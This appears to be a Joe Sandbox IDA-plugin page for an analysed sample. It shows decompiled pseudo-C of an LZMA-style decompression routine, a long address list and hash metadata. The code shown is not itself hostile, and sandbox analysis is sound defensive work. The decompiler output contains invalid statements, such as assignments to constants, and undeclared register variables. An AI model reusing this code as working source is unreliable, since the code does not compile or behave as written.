													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406677
0x00406677
0x0040667b
0x0040669c
0x004066a3
0x004066a9
0x004066af
0x004066c1
0x004066c7
0x004066cc
0x00000000
0x0040667d
0x00406683
0x00406a44
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00000000
0x00000000
0x00406a95
0x00406a99
0x00406c48
0x00406c5e
0x00406c66
0x00406c6d
0x00406c6f
0x00406c76
0x00406c7a
0x00406c7a
0x00406aa5
0x00406aac
0x00406ab4
0x00406ab7
0x00406aba
0x00406aba
0x00406ac0
0x00406ac0
0x0040625c
0x0040625c
0x0040625c
0x00406265
0x00000000
0x00000000
0x0040626b
0x00000000
0x00406276
0x00000000
0x00000000
0x0040627f
0x00406282
0x00406285
0x00406289
0x00000000
0x00000000
0x0040628f
0x00406292
0x00406294
0x00406295
0x00406298
0x0040629a
0x0040629b
0x0040629d
0x004062a0
0x004062a5
0x004062aa
0x004062b3
0x004062c6
0x004062c9
0x004062d5
0x004062fd
0x004062ff
0x0040630d
0x0040630d
0x00406311
0x00000000
0x00000000
0x00000000
0x00000000
0x00406301
0x00406301
0x00406304
0x00406305
0x00406305
0x00000000
0x00406301
0x004062db
0x004062e0
0x004062e0
0x004062e9
0x004062f1
0x004062f4
0x00000000
0x004062fa
0x004062fa
0x00000000
0x004062fa
0x00000000
0x00406317
0x00406317
0x0040631b
0x00406bc7
0x00000000
0x00406bc7
0x00406324
0x00406334
0x00406337
0x0040633a
0x0040633a
0x0040633a
0x0040633d
0x00406341
0x00000000
0x00000000
0x00406343
0x00406349
0x00406373
0x00406379
0x00406380
0x00000000
0x00406380
0x0040634f
0x00406352
0x00406357
0x00406357
0x00406362
0x0040636a
0x0040636d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b2
0x004063b8
0x004063bb
0x004063c8
0x004063d0
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00406bd6
0x00000000
0x00406bd6
0x00406397
0x004063a2
0x004063a2
0x004063a2
0x004063a5
0x004063a8
0x004063ab
0x004063b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063d8
0x004063da
0x004063dd
0x0040644e
0x00406451
0x00406454
0x0040645b
0x00406465
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x004063df
0x004063e3
0x004063e6
0x004063e8
0x004063eb
0x004063ee
0x004063f0
0x004063f3
0x004063f5
0x004063fa
0x004063fd
0x00406400
0x00406404
0x0040640b
0x0040640e
0x00406415
0x00406419
0x00406421
0x00406421
0x00406421
0x0040641b
0x0040641b
0x0040641b
0x00406410
0x00406410
0x00406410
0x00406425
0x00406428
0x00406446
0x00406448
0x00000000
0x0040642a
0x0040642a
0x0040642d
0x00406430
0x00406433
0x00406435
0x00406435
0x00406435
0x00406438
0x0040643b
0x0040643d
0x0040643e
0x00406441
0x00000000
0x00406441
0x00000000
0x00000000
0x00000000
0x004066e1
0x004066e5
0x00406708
0x0040670b
0x0040670e
0x00406718
0x004066e7
0x004066e7
0x004066ea
0x004066ed
0x004066f0
0x004066fd
0x00406700
0x00406700
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00000000
0x00406724
0x00406728
0x00000000
0x00000000
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x0040673a
0x0040673e
0x0040673e
0x00406741
0x00406745
0x00000000
0x00000000
0x00406795
0x00406799
0x004067a0
0x004067a3
0x004067a6
0x004067b0
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00406a44
0x0040679b
0x00000000
0x00000000
0x004067bc
0x004067c0
0x004067c7
0x004067ca
0x004067cd
0x004067c2
0x004067c2
0x004067c2
0x004067d0
0x004067d3
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x004067df
0x004067df
0x004067e2
0x004067e9
0x004067ee
0x00000000
0x00000000
0x0040687c
0x0040687c
0x00406880
0x00406c1e
0x00000000
0x00406c1e
0x00406886
0x00406889
0x0040688c
0x00406890
0x00406893
0x00406899
0x0040689b
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x00000000
0x00000000
0x00406471
0x00406471
0x00406475
0x00406be2
0x00000000
0x00406be2
0x0040647b
0x0040647e
0x00406481
0x00406485
0x00406488
0x0040648e
0x00406490
0x00406490
0x00406490
0x00406493
0x00406496
0x00406496
0x00406499
0x0040649c
0x00000000
0x00000000
0x004064a2
0x004064a8
0x00000000
0x00000000
0x004064ae
0x004064ae
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064bf
0x004064c2
0x004064c4
0x004064ca
0x004064cd
0x004064d0
0x004064d3
0x004064d6
0x004064d9
0x004064dc
0x004064f8
0x004064fb
0x004064fe
0x00406501
0x00406508
0x0040650c
0x0040650e
0x00406512
0x004064de
0x004064de
0x004064e2
0x004064ea
0x004064ef
0x004064f1
0x004064f3
0x004064f3
0x00406515
0x0040651c
0x0040651f
0x00000000
0x00406525
0x00000000
0x00406525
0x00000000
0x0040652a
0x0040652a
0x0040652e
0x00406bee
0x00000000
0x00406bee
0x00406534
0x00406537
0x0040653a
0x0040653e
0x00406541
0x00406547
0x00406549
0x00406549
0x00406549
0x0040654c
0x0040654f
0x0040654f
0x0040654f
0x00406555
0x00000000
0x00000000
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406569
0x0040656c
0x0040656f
0x00406572
0x00406575
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406596
0x00406599
0x0040659d
0x0040659f
0x00406577
0x00406577
0x0040657f
0x00406584
0x00406586
0x00406588
0x00406588
0x004065a2
0x004065a9
0x004065ac
0x00000000
0x004065ae
0x00000000
0x004065ae
0x004065ac
0x004065b3
0x004065b3
0x004065b3
0x004065b3
0x00000000
0x00000000
0x004065ee
0x004065ee
0x004065f2
0x00406bfa
0x00000000
0x00406bfa
0x004065f8
0x004065fb
0x004065fe
0x00406602
0x00406605
0x0040660b
0x0040660d
0x0040660d
0x0040660d
0x00406610
0x00406613
0x00406613
0x00406619
0x004065b7
0x004065b7
0x004065ba
0x00000000
0x004065ba
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406636
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406661
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x00406666
0x0040666d
0x00406670
0x00000000
0x00406672
0x00000000
0x00406672
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x004066cf
0x004066cf
0x004066d2
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00000000
0x00406a0e
0x00406a12
0x00406a34
0x00406a37
0x00406a41
0x00406a44
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00406a44
0x00406a14
0x00406a17
0x00406a1b
0x00406a1e
0x00406a1e
0x00406a21
0x00000000
0x00000000
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00406b02
0x00406b02
0x00000000
0x00406b02
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00000000
0x00406bbc
0x00406bbf
0x00406ac0
0x00000000
0x00000000
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406813
0x00406815
0x00406817
0x00406817
0x00406818
0x0040681b
0x00406822
0x00406825
0x00406833
0x00000000
0x00000000
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00000000
0x00406b18
0x00406b18
0x00406b1c
0x00406c54
0x00000000
0x00406c54
0x00406b22
0x00406b25
0x00406b28
0x00406b2c
0x00406b2f
0x00406b35
0x00406b37
0x00406b37
0x00406b37
0x00406b3a
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b40
0x00406b40
0x00406b44
0x00406ba4
0x00406ba7
0x00406bac
0x00406bad
0x00406baf
0x00406bb1
0x00406bb4
0x00406ac0
0x00406ac0
0x00000000
0x00406ac6
0x00406ac0
0x00406b46
0x00406b4c
0x00406b4f
0x00406b52
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b64
0x00406b67
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8d
0x00406b8f
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b71
0x00406b76
0x00406b78
0x00406b7b
0x00406b7b
0x00406b96
0x00406b9d
0x00000000
0x00406b9f
0x00000000
0x00406b9f
0x00000000
0x0040683b
0x0040683e
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00000000
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x00406ac0
0x00406a47
0x00406a44
0x00000000
0x0040667b

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ee9186d9e199c498ff44372a59f0aabbd92d4fec70e472f5091ca3ea8365d0
Instruction ID: dad10803e94b7434793a97df14ca0657f99d30c9f847207908393b4e9753140a
Opcode Fuzzy Hash: a0ee9186d9e199c498ff44372a59f0aabbd92d4fec70e472f5091ca3ea8365d0
Instruction Fuzzy Hash: 94711371E04228CBDF24CF98C844BADBBF1FB49305F15806AD856BB281D7789996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406795 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406795() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406C7B))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc("true", 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc("true",  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
